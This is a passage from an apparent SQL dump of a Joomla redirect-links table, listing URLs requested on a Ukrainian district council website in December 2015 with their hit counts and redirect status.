00:00:00',301),(22759,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1330:2014-06-03-06-17-00&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 03:33:35','0000-00-00 00:00:00',301),(22760,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=312:-2011-&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 03:39:06','0000-00-00 00:00:00',301),(22761,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 03:40:28','0000-00-00 00:00:00',301),(22762,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1209:-----2014-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 03:40:34','0000-00-00 00:00:00',301),(22763,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1111:2013-10-22-16-06-36&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 03:40:51','0000-00-00 00:00:00',301),(22764,'http://www.malyn-rayrada.org.ua/index.php?id=39:-22022012-&Itemid=76&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-12-28 04:00:25','0000-00-00 00:00:00',301),(22765,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=800:-l-r&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 04:03:31','0000-00-00 00:00:00',301),(22766,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=965:2013-03-14-10-56-03&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 04:03:35','0000-00-00 00:00:00',301),(22767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11&lang=ru','','','',1,0,'2015-12-28 04:03:43','0000-00-00 00:00:00',301),(22768,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=746:-2012-&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:05:18','0000-00-00 00:00:00',301),(22769,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-12-28 04:08:18','0000-00-00 00:00:00',301),(22770,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-28 04:13:12','0000-00-00 00:00:00',301),(22771,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 04:15:00','0000-00-00 00:00:00',301),(22772,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=965:2013-03-14-10-56-03&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 04:20:13','0000-00-00 00:00:00',301),(22773,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1165:-2014-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 04:20:25','0000-00-00 00:00:00',301),(22774,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=828:-q-q&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 04:20:58','0000-00-00 00:00:00',301),(22775,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:28:18','0000-00-00 00:00:00',301),(22776,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=911:2013-01-22-13-27-41&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:30:48','0000-00-00 00:00:00',301),(22777,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1256-pro-kompleksnu-programu-pidtrimki-diyalnosti-komunalnoji-ustanovi-malinskij-rajonnij-trudovij-arkhiv-malinskoji-rajonnoji-radi-na-2016-2021roki','','','',6,0,'2015-12-28 04:32:33','0000-00-00 00:00:00',301),(22778,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',8,0,'2015-12-28 04:32:35','0000-00-00 00:00:00',301),(22779,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-28 04:32:37','0000-00-00 00:00:00',301),(22780,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-28 04:32:39','0000-00-00 00:00:00',301),(22781,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-28 04:32:41','0000-00-00 00:00:00',301),(22782,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-28 04:32:43','0000-00-00 00:00:00',301),(22783,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1257:pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',2,0,'2015-12-28 04:32:45','0000-00-00 00:00:00',301),(22784,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1259:pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',2,0,'2015-12-28 04:32:49','0000-00-00 00:00:00',301),(22785,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1261:pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',2,0,'2015-12-28 04:32:51','0000-00-00 00:00:00',301),(22786,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1282:pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik','','','',2,0,'2015-12-28 04:32:53','0000-00-00 00:00:00',301),(22787,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1287:pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','','',2,0,'2015-12-28 04:32:55','0000-00-00 00:00:00',301),(22788,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1289:pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',2,0,'2015-12-28 04:32:56','0000-00-00 00:00:00',301),(22789,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1294:pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',2,0,'2015-12-28 04:32:58','0000-00-00 00:00:00',301),(22790,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1259:pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',2,0,'2015-12-28 04:33:00','0000-00-00 00:00:00',301),(22791,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?tmpl=component&print=1&layout=default&page=&catid=79&id=1294:pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',2,0,'2015-12-28 04:33:03','0000-00-00 00:00:00',301),(22792,'http://malyn-rayrada.org.ua/index.php?Itemid=109','','','',10,0,'2015-12-28 04:33:05','0000-00-00 00:00:00',301),(22793,'http://malyn-rayrada.org.ua/index.php?Itemid=245','','','',13,0,'2015-12-28 04:33:06','0000-00-00 00:00:00',301),(22794,'http://malyn-rayrada.org.ua/index.php?Itemid=246','','','',12,0,'2015-12-28 04:33:08','0000-00-00 00:00:00',301),(22795,'http://malyn-rayrada.org.ua/index.php?Itemid=247','','','',10,0,'2015-12-28 04:33:23','0000-00-00 00:00:00',301),(22796,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=709:2012-06-14-15-04-11&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 04:35:30','0000-00-00 00:00:00',301),(22797,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=692:-2012&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 04:38:31','0000-00-00 00:00:00',301),(22798,'http://www.malyn-rayrada.org.ua/index.php?id=51:--19072013-&Itemid=92&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2015-12-28 04:41:01','0000-00-00 00:00:00',301),(22799,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 04:41:02','0000-00-00 00:00:00',301),(22800,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=507:2011-12-19-17-10-52&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 04:41:07','0000-00-00 00:00:00',301),(22801,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1094:2013-09-24-05-02-52&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 04:41:12','0000-00-00 00:00:00',301),(22802,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=728:2012-06-26-07-51-10&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:41:15','0000-00-00 00:00:00',301),(22803,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=316:-2011-2012-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 04:41:33','0000-00-00 00:00:00',301),(22804,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:41:46','0000-00-00 00:00:00',301),(22805,'http://www.malyn-rayrada.org.ua/index.php?catid=21:2010-06-07-09-43-24&id=27:2010-06-07-11-05-24&Itemid=47&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 04:43:34','0000-00-00 00:00:00',301),(22806,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=330:2011-05-20-16-28-08&Itemid=66&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:43:38','0000-00-00 00:00:00',301),(22807,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=333:-2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 04:51:05','0000-00-00 00:00:00',301),(22808,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=545:2012-01-26-12-06-01&Itemid=76&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 04:54:16','0000-00-00 00:00:00',301),(22809,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:00:18','0000-00-00 00:00:00',301),(22810,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=270:-4-6-&Itemid=62&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 05:00:22','0000-00-00 00:00:00',301),(22811,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:00:28','0000-00-00 00:00:00',301),(22812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37&layout=blog&Itemid=72&lang=uk','','','',5,0,'2015-12-28 05:04:12','0000-00-00 00:00:00',301),(22813,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:06:32','0000-00-00 00:00:00',301),(22814,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1083:------------2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 05:06:36','0000-00-00 00:00:00',301),(22815,'http://www.malyn-rayrada.org.ua/index.php?catid=8:2010-06-05-12-54-02&id=10:2010-06-05-15-11-20&Itemid=13&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:06:42','0000-00-00 00:00:00',301),(22816,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:12:37','0000-00-00 00:00:00',301),(22817,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1048:2013-07-10-05-53-06&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:14:29','0000-00-00 00:00:00',301),(22818,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=549:-2010-2012-&Itemid=76&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:19:31','0000-00-00 00:00:00',301),(22819,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1063:2013-08-02-17-32-04&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:24:17','0000-00-00 00:00:00',301),(22820,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:24:38','0000-00-00 00:00:00',301),(22821,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=934:---------6---16112010-5---------------&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:25:08','0000-00-00 00:00:00',301),(22822,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=862:-qq&Itemid=18&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 05:26:39','0000-00-00 00:00:00',301),(22823,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=688:2012-05-25-16-34-51&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:26:47','0000-00-00 00:00:00',301),(22824,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1274:----------------l--r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:31:03','0000-00-00 00:00:00',301),(22825,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1192:-2014-2015-&Itemid=97&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:31:10','0000-00-00 00:00:00',301),(22826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=37&layout=blog&Itemid=72&lang=uk','','','',1,0,'2015-12-28 05:32:17','0000-00-00 00:00:00',301),(22827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=59&layout=blog&Itemid=107&lang=uk','','','',2,0,'2015-12-28 05:35:50','0000-00-00 00:00:00',301),(22828,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1060:2013-07-27-10-13-15&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 05:36:25','0000-00-00 00:00:00',301),(22829,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=194:-----------2008-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:42:04','0000-00-00 00:00:00',301),(22830,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=636:-2011-2015-&Itemid=80&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:42:53','0000-00-00 00:00:00',301),(22831,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=515:2011-12-22-10-09-17&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:42:57','0000-00-00 00:00:00',301),(22832,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=195:------------2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:43:01','0000-00-00 00:00:00',301),(22833,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=659:-2011-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:44:42','0000-00-00 00:00:00',301),(22834,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1110:-9-2013-&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:54:09','0000-00-00 00:00:00',301),(22835,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=748:2012-08-12-17-56-55&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:00','0000-00-00 00:00:00',301),(22836,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1072:-24-6-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:10','0000-00-00 00:00:00',301),(22837,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1200:2014-01-31-07-40-52&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:14','0000-00-00 00:00:00',301),(22838,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1131:9-------&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:25','0000-00-00 00:00:00',301),(22839,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=774:2012-10-02-09-30-45&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:29','0000-00-00 00:00:00',301),(22840,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=598:2012-02-29-14-13-44&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:43','0000-00-00 00:00:00',301),(22841,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=635:-2011-2015-&Itemid=80&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:57:47','0000-00-00 00:00:00',301),(22842,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1165:-2014-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 05:58:10','0000-00-00 00:00:00',301),(22843,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=805:2012-10-30-13-35-53&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 05:58:32','0000-00-00 00:00:00',301),(22844,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=448:-2011-2012-&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:58:47','0000-00-00 00:00:00',301),(22845,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=833:2012-11-30-06-51-18&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 05:58:55','0000-00-00 00:00:00',301),(22846,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=778:2012-10-03-08-53-07&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:59:20','0000-00-00 00:00:00',301),(22847,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1119:2013-10-25-12-26-37&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 05:59:29','0000-00-00 00:00:00',301),(22848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=728:2012-06-26-07-51-10&catid=43:--25072012-&Itemid=82&lang=en','','','',9,0,'2015-12-28 06:07:33','0000-00-00 00:00:00',301),(22849,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=710:2012-06-14-15-07-29&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 06:20:36','0000-00-00 00:00:00',301),(22850,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=938:---------------6612-------626-&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 06:25:05','0000-00-00 00:00:00',301),(22851,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=773:2012-10-02-06-48-57&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 06:30:12','0000-00-00 00:00:00',301),(22852,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58:--30042014-&id=1299:-lr-&lang=ru','','','',2,0,'2015-12-28 06:30:42','0000-00-00 00:00:00',301),(22853,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=671:2012-05-09-13-09-05&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 06:30:50','0000-00-00 00:00:00',301),(22854,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=194:-----------2008-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 06:31:10','0000-00-00 00:00:00',301),(22855,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=774:2012-10-02-09-30-45&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 06:31:17','0000-00-00 00:00:00',301),(22856,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:------qq&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 06:31:35','0000-00-00 00:00:00',301),(22857,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1263:2014-03-31-14-00-08&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 06:32:19','0000-00-00 00:00:00',301),(22858,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',16,0,'2015-12-28 06:32:27','0000-00-00 00:00:00',301),(22859,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=544:2012-01-26-12-03-44&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 06:32:35','0000-00-00 00:00:00',301),(22860,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 06:32:53','0000-00-00 00:00:00',301),(22861,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1107:c-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 06:33:16','0000-00-00 00:00:00',301),(22862,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=597:-l-r-2011-&Itemid=77&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 06:36:30','0000-00-00 00:00:00',301),(22863,'http://www.malyn-rayrada.org.ua/index.php?catid=30&id=228:-2011-&Itemid=61&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 07:03:11','0000-00-00 00:00:00',301),(22864,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 07:03:40','0000-00-00 00:00:00',301),(22865,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1340:------l---28r&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 07:03:49','0000-00-00 00:00:00',301),(22866,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 07:03:55','0000-00-00 00:00:00',301),(22867,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1285:2014-04-17-16-55-05&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 07:04:16','0000-00-00 00:00:00',301),(22868,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1337:2014-06-10-11-11-42&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:04:24','0000-00-00 00:00:00',301),(22869,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=984:-20-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:04:32','0000-00-00 00:00:00',301),(22870,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=700:-2012-2015-&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:04:53','0000-00-00 00:00:00',301),(22871,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=407:----------l---r--2010-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 07:04:58','0000-00-00 00:00:00',301),(22872,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=689:2012-05-29-17-48-13&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 07:05:06','0000-00-00 00:00:00',301),(22873,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1157:-----------11--2013-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 07:05:12','0000-00-00 00:00:00',301),(22874,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:05:20','0000-00-00 00:00:00',301),(22875,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=751:-15-6-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 07:06:35','0000-00-00 00:00:00',301),(22876,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=506:-lr&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:06:50','0000-00-00 00:00:00',301),(22877,'http://www.malyn-rayrada.org.ua/index.php?catid=6:2010-06-05-12-52-17&id=6:2010-06-05-14-26-47&Itemid=9&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 07:06:56','0000-00-00 00:00:00',301),(22878,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=270:-4-6-&Itemid=62&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 07:07:13','0000-00-00 00:00:00',301),(22879,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=524:2011-12-30-10-17-39&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 07:07:58','0000-00-00 00:00:00',301),(22880,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1012:l-r&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 07:08:36','0000-00-00 00:00:00',301),(22881,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=515:2011-12-22-10-09-17&Itemid=73&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 07:42:40','0000-00-00 00:00:00',301),(22882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=588:2012-02-27-13-48-51&catid=40:--28032012-&Itemid=77&lang=uk','','','',2,0,'2015-12-28 07:49:45','0000-00-00 00:00:00',301),(22883,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 08:00:55','0000-00-00 00:00:00',301),(22884,'http://www.malyn-rayrada.org.ua/common/iframe/1074','','','',1,0,'2015-12-28 08:08:48','0000-00-00 00:00:00',301),(22885,'http://www.malyn-rayrada.org.ua/sfclient/mySave.html','','','',1,0,'2015-12-28 08:09:23','0000-00-00 00:00:00',301),(22886,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=996:2013-04-25-12-09-57&Itemid=17&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 08:19:49','0000-00-00 00:00:00',301),(22887,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 08:20:02','0000-00-00 00:00:00',301),(22888,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=647:2012-04-09-08-35-02&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:23:24','0000-00-00 00:00:00',301),(22889,'http://malyn-rayrada.org.ua/index.php/1279-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-3-sesiyu-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-28 08:25:59','0000-00-00 00:00:00',301),(22890,'http://malyn-rayrada.org.ua/index.php/1286-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-28 08:26:02','0000-00-00 